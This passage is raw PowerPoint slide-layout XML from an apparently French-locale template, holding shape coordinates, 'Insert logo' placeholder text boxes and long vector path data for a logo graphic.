                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3454400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="1828800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="3657599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4368800" y="3657599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4368800" y="4571999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3454400" y="4571999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3454400" y="5486399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4368800" y="5486399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4368800" y="4571999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="4571999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="9143998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="9144000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9144000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9143998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9143403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84900" y="930268"/>
            <a:ext cx="7124700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4900" y="2652632"/>
            <a:ext cx="9012555" cy="1922372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13129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C8E13DE4-5314-44E1-9E54-71B64E53C8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5283200" y="548640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12001" y="3657599"/>
            <a:ext cx="8229600" cy="4571999"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="378000" tIns="39600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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphique 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0424D29-3A81-4B93-B976-4CFAA6EE3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41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1625600" y="914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98552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5283200" y="73152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0" y="1828800"/>
            <a:ext cx="914400" cy="914392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700"/>
              </a:spcBef>
              <a:defRPr sz="4000" b="1" spc="-16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00" y="2743192"/>
            <a:ext cx="7315200" cy="36576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Heading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C103ADA-D47B-4E9B-AEDE-C787C53F5E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35400" y="5194401"/>
            <a:ext cx="1876425" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Insert logo</a:t>
            </a:r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8EF4B44C-FC5F-4865-A2CA-6AD146697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12682" y="5194401"/>
            <a:ext cx="1876425" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Insert logo</a:t>
            </a:r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32F59FA-5C54-4BEE-A151-61D1A5F550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86447" y="5069344"/>
            <a:ext cx="975760" cy="901064"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Insert logo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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F6ED36D-FDAC-4123-A48A-812DD31A9E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37064" y="5019331"/>
            <a:ext cx="1000800" cy="1000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1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Insert 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70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1C329BC-FFDC-4CD3-ABE4-D824343B7B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13798911" y="986627"/>
            <a:ext cx="1256665" cy="92075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1158062" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1141564" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164450" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1184147" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189028" y="58381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174737" y="58381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158062" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1214012" y="34544"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1199083" y="34544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214005" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233703" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1238949" y="58293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1223429" y="58293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214012" y="34544"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1207884" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1190269" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174737" y="58381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189028" y="58381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199083" y="34544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214012" y="34544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1207884" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1256588" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1240091" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1223429" y="58293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1238949" y="58293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256588" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1104366" y="18224"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1089978" y="19704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1078855" y="24364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1071680" y="32540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069136" y="44564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1071680" y="56531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1078855" y="64681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089978" y="69335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104366" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118724" y="69335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1129855" y="64681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1135351" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1090637" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083906" y="55092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083906" y="33934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1090637" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1135317" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1129855" y="24364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118724" y="19704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104366" y="18224"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1135317" y="30568"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1118019" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124750" y="33934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124750" y="55092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118019" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1135351" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137052" y="56531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1139609" y="44564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137052" y="32540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1135317" y="30568"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1058354" y="863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1043584" y="863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1043584" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058354" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058354" y="863"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1011313" y="31432"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="996467" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="996467" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1011313" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1011313" y="31432"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1032814" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="983081" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="983081" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032814" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032814" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1025296" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1017523" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1007970" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1001428" y="3759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="997669" y="8529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="996467" y="15290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="996467" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1011313" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1011567" y="12700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1013726" y="10883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032814" y="10883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032814" y="863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1025296" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="1032814" y="10883"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1025994" y="10883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1029449" y="11061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032814" y="11315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032814" y="10883"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="926706" y="863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="911936" y="863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="911936" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926706" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926706" y="863"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="870343" y="37401"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="861631" y="37401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850026" y="38252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840244" y="41117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="833492" y="46461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830973" y="54749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832585" y="62103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837199" y="67087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="844486" y="69919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854113" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="862743" y="70313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870702" y="68880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878094" y="66620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885024" y="63639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899871" y="63639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899871" y="59931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850658" y="59931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845731" y="59499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845731" y="48971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852385" y="47066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899871" y="47066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899871" y="44297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899248" y="41021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885024" y="41021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878382" y="38773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870343" y="37401"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="899871" y="63639"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="885024" y="63639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885024" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899871" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899871" y="63639"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="899871" y="47066"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="872858" y="47066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="879843" y="48526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885024" y="50177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885024" y="54152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878782" y="56432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871850" y="58266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864834" y="59487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="858342" y="59931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899871" y="59931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899871" y="47066"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="896313" y="30568"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="872591" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885024" y="31356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885024" y="41021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899248" y="41021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="897554" y="32101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896313" y="30568"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="866381" y="18224"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="858482" y="18572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850692" y="19592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842951" y="21246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="835202" y="23495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840473" y="34277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="847882" y="32390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854502" y="31261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="860409" y="30712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865682" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896313" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891027" y="24041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880549" y="19590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866381" y="18224"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="796963" y="31432"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="782116" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782116" y="54673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783645" y="61926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787992" y="66949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="794798" y="69870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803706" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810526" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="816140" y="70383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821054" y="69507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821054" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="798868" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796963" y="55956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796963" y="31432"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="821054" y="57607"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="815098" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821054" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821054" y="57607"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="821054" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="768730" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768730" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821054" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821054" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="796963" y="4318"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="782116" y="8547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782116" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796963" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796963" y="4318"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="758456" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="743699" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="743699" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758456" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758456" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="758456" y="863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="743699" y="863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="743699" y="13728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758456" y="13728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758456" y="863"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="666610" y="75565"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="666610" y="87477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671585" y="88657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678845" y="89989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687950" y="91078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698461" y="91528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711770" y="89802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722266" y="84448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726188" y="79184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="695185" y="79184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686821" y="78776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678921" y="77793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672009" y="76602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666610" y="75565"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="731621" y="60274"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="716775" y="60274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715294" y="68731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711485" y="74620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704923" y="78063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="695185" y="79184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726188" y="79184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729149" y="75209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="61823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="60274"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="691045" y="18224"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679021" y="19691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669570" y="24268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="663389" y="32213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="661174" y="43789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="663389" y="55352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669570" y="63295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679021" y="67872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="691045" y="69342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699399" y="68727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="706467" y="66946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712256" y="64096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716775" y="60274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="60274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="56997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682497" y="56997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675932" y="53111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675932" y="34467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682497" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="27292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716775" y="27292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712306" y="23475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="706534" y="20624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699449" y="18841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="691045" y="18224"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="731621" y="30568"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="710298" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716775" y="34467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716775" y="53111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710298" y="56997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="56997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="30568"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="731621" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="716775" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716775" y="27292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="27292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731621" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="650379" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="635609" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635609" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650379" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650379" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="650379" y="863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="635609" y="863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635609" y="13728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650379" y="13728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650379" y="863"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="583387" y="18224"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="571773" y="19607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="562121" y="24107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555526" y="32251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553084" y="44564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555526" y="56863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="562121" y="64976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571773" y="69445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583387" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="591206" y="70252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598125" y="68580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604025" y="65821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608787" y="62001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="62001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575106" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="567943" y="54571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="567943" y="34467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575106" y="30568"/>
                </a:lnTo>
                <a:lnTo>
